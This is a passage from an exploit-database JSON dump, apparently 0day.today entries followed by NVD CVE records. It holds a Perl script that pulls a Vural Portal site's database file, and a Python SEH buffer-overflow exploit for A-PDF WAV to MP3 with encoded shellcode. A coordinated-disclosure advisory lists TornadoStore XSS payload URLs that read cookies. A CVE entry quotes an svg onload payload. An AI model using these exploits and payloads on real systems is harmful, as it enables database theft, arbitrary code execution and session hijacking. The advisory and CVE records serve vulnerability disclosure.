\r\n \r\n \r\nuse LWP::Simple;\r\nuse LWP::UserAgent;\r\n\r\nsystem('cls');\r\nsystem('title Vural Portal 2010 Remote Database Disclosure Exploit');\r\nsystem('color 4');\r\n\r\n\r\nif(@ARGV < 2)\r\n{\r\nprint \"[-]Ornegi inceleyin\\n\\n\";\r\n&help; exit();\r\n}\r\nsub help()\r\n{\r\nprint \"[+] usage1 : perl $0 site.com /path/ \\n\";\r\nprint \"[+] usage2 : perl $0 localhost / \\n\";\r\n}\r\n\r\nprint \"\\n************************************************************************\\n\";\r\nprint \"\\* Vural Portal 2010 Remote Database Disclosure Exploit *\\n\";\r\nprint \"\\* Exploited By : KnocKout *\\n\";\r\nprint \"\\* msn : knockoutr[at]msn[dot]com *\\n\";\r\nprint \"\\* Special Thankz : DaiMon Barcod3 *\\n\";\r\nprint \"\\*********************************************************************\\n\\n\\n\";\r\n\r\n($TargetIP, $path, $File,) = @ARGV;\r\n\r\n$File=\"db/123.mdb\";\r\nmy $url = \"http://\" . $TargetIP . $path . $File;\r\nprint \"\\n wait!!! \\n\\n\";\r\n\r\nmy $useragent = LWP::UserAgent->new();\r\nmy $request = $useragent->get($url,\":content_file\" => \"C:/db.mdb\");\r\n\r\nif ($request->is_success)\r\n{\r\nprint \"[+] $url Exploited!\\n\\n\";\r\nprint \"[+] Database saved to C:/db.mdb\\n\";\r\nexit();\r\n}\r\nelse\r\n{\r\nprint \"[!] Exploiting $url Failed !\\n[!] \".$request->status_line.\"\\n\";\r\nexit();\r\n}\r\n\r\n\n\n# 0day.today [2018-03-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13737"}, {"lastseen": "2018-01-02T03:07:48", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2010-08-18T00:00:00", "published": "2010-08-18T00:00:00", "id": "1337DAY-ID-13736", "href": "https://0day.today/exploit/description/13736", "type": "zdt", "title": "A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit", "sourceData": "===================================================\r\nA-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit\r\n===================================================\r\n\r\n#!/usr/bin/env python\r\n \r\n#################################################################################\r\n#\r\n# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit\r\n# Exloit By: Dr_IDE\r\n# Tested On: XPSP3\r\n# Date: August 18, 2010\r\n# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html\r\n# Reference: http://www.exploit-db.com/exploits/14676/\r\n# Usage: Import File, Select It, Click Play, Calc.\r\n#\r\n# EDB Notes:\r\n# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct\r\n# EIP overwrite which is operating system specific.\r\n#\r\n#################################################################################\r\n \r\n# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH\r\n \r\ncode = (\r\n\"\\x89\\xe1\\xd9\\xee\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\"\r\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\"\r\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\"\r\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\"\r\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a\"\r\n\"\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\"\r\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x45\\x55\\x42\\x58\\x45\\x51\\x4a\\x4f\\x4c\"\r\n\"\\x4b\\x50\\x4f\\x45\\x48\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x43\\x31\\x4a\"\r\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\"\r\n\"\\x51\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4d\\x54\\x49\\x50\\x42\\x54\\x45\"\r\n\"\\x57\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x48\\x42\\x4a\\x4b\\x4c\"\r\n\"\\x34\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4b\\x55\\x4c\"\r\n\"\\x4b\\x51\\x4f\\x47\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\"\r\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\"\r\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4c\\x49\\x51\\x4c\\x46\"\r\n\"\\x44\\x44\\x44\\x48\\x43\\x51\\x4f\\x50\\x31\\x4a\\x56\\x45\\x30\\x50\"\r\n\"\\x56\\x42\\x44\\x4c\\x4b\\x51\\x56\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\"\r\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x43\\x58\\x45\"\r\n\"\\x58\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x43\"\r\n\"\\x58\\x4a\\x50\\x4d\\x5a\\x44\\x44\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b\"\r\n\"\\x4e\\x4c\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x43\"\r\n\"\\x51\\x42\\x4c\\x42\\x43\\x43\\x30\\x41\\x41\");\r\n \r\nbuff = (\"\\x41\" * 4132);\r\nnops = (\"\\x90\" * 12);\r\nnseh = (\"\\xEB\\x06\\x90\\x90\");\r\nretn = (\"\\x5C\\x26\\x47\\x00\");\r\njunk = (\"\\x42\" * 300);\r\nsploit = (buff+ nseh + retn + nops + code + junk);\r\n \r\ntry:\r\n f1 = open(\"Dr_IDEs.wav\",\"w\"); #No file checking, any file extension works... (.xyz .foo .abc)\r\n f1.write(sploit);\r\n f1.close();\r\n print ('[*] Success. Load File.');\r\n \r\nexcept:\r\n print (\"[-] Error, could not write the file.\");\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13736"}, {"lastseen": "2018-01-06T01:01:09", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "1337DAY-ID-13066", "href": "https://0day.today/exploit/description/13066", "type": "zdt", "title": "TornadoStore 1.4.3 XSS Vulnerability", "sourceData": "====================================\r\nTornadoStore 1.4.3 XSS Vulnerability\r\n====================================\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple XSS in TornadoStore 1.4.3\r\nAdvisory ID: BONSAI-2010-0107\r\nAdvisory URL:\r\nhttp://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php\r\nDate published: 2010-06-29\r\nVendors contacted: TornadoStore\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Multiple Cross Site Scripting (XSS)\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: Yes\r\nCVE Name: CVE-2010-1328 \r\n\r\n\r\n3. *Software Description*\r\n\r\nTornadoStore\u00d1\u201a\u00d0\u201d\u00d0\u00b2 is an ecommerce platform. The objective is to solve integrally\r\nthe commercialization of products and services of companies using an online \r\npayment system. [0].\r\n\r\n\r\n4. *Vulnerability Description*\r\n\r\nCross-Site Scripting attacks are a type of injection problem, in which \r\nmalicious scripts are injected into the otherwise benign and trusted web sites.\r\nCross-site scripting (XSS) attacks occur when an attacker uses a web \r\napplication to send malicious code, generally in the form of a browser side \r\nscript, to a different end user. Flaws that allow these attacks to succeed are\r\nquite widespread and occur anywhere a web application uses input from a user\r\nin the output it generates without validating or encoding it. \r\n\r\nFor additional information, please read [1].\r\n\r\n\r\n5. *Vulnerable packages*\r\n\r\nVersion <= 1.4.3\r\n\r\n\r\n6. *Non-vulnerable packages*\r\n\r\nTornadoStore developers informed us that all users should upgrade to the latest \r\nversion of TornadoStore, which fixes this vulnerability. More information to be \r\nfound here:\r\n http://www.tornadostore.com\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).\r\n\r\n\r\n8. *Technical Description*\r\n\r\n8.1 A Reflected Cross Site Scripting vulnerability was found in the \r\n\"tipo\" and \"destino\" variables within the 'Services' section\r\nand \"rubro\", \"arti\" on 'Products' section.\r\nThis is because the application does not properly sanitise\r\nthe users input. The vulnerability can be triggered by clicking on the \r\nfollowing URL:\r\n\r\nhttp://www.example.com/login_registrese.php3?tipo=bonsai\"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3\r\n\r\nhttp://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3\"<script>alert(document.cookie)</script>\r\n\r\nhttp://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4\"</a><script>alert(document.cookie)</script>\"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL\r\n\r\nhttp://www.example.com/recomenda_articulo.php3?arti=002\"><script>alert(document.cookie)</script>\r\n\r\n8.2 A Reflected Cross Site Scripting vulnerability was found in the\r\nTornadoStore Administration Panel. In \"descrip\" and \"tit\" variables\r\nwithin the 'e-Commerce' Section. This could lead to admin session hijacking.\r\n\r\nhttp://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip=\"<script>alert(document.cookie)</script><a href=\"\r\n\r\nhttp://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=\r\n\r\nhttp://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n - 2010-02-02:\r\n Vulnerabilities were identified.\r\n\r\n - 2010-02-08:\r\n Vendor confirmed these vulnerabilities.\r\n\r\n - 2010-02-16:\r\n Vendor contacted for an approximate fix release date. No specific answer given.\r\n\r\n - 2010-03-10:\r\n Vendor fixed these vulnerabilities. No specific answer given.\r\n\r\n - 2010-04-12:\r\n Vendor fixed this issue.\r\n\r\n - 2010-05-29:\r\n The advisory BONSAI-2010-0107 is published.\r\n\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13066"}, {"lastseen": "2018-01-04T19:00:13", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category dos / poc", "modified": "2010-06-11T00:00:00", "published": "2010-06-11T00:00:00", "id": "1337DAY-ID-12663", "href": "https://0day.today/exploit/description/12663", "type": "zdt", "title": "GoodiWare GoodReader iPhone XLS Denial of Service", "sourceData": "I wrote a fuzzer \"dumb fuzzer\" and used a sample from http://www.inj3ct0r.com/sploits/12663.xls \r\nwhich I randomly found on the internet. \r\nI mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.\r\n\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12663"}], "cve": [{"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in the uDesign (aka U-Design) theme 2.3.0 before 2.7.10 for WordPress allows remote attackers to inject arbitrary web script or HTML via a fragment identifier, as demonstrated by #<svg onload=alert(1)>.", "modified": "2017-10-11T15:37:00", "id": "CVE-2015-7357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7357", "published": "2017-10-03T01:29:00", "title": "CVE-2015-7357", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:17:09", "bulletinFamily": "NVD", "description": "Hipchat Server before 2.2.3 allows remote authenticated users with Server Administrator level privileges to execute arbitrary code by importing a file.", "modified": "2018-10-09T20:01:00", "id": "CVE-2017-7357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7357", "published": "2017-04-14T18:59:00", "title": "CVE-2017-7357", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}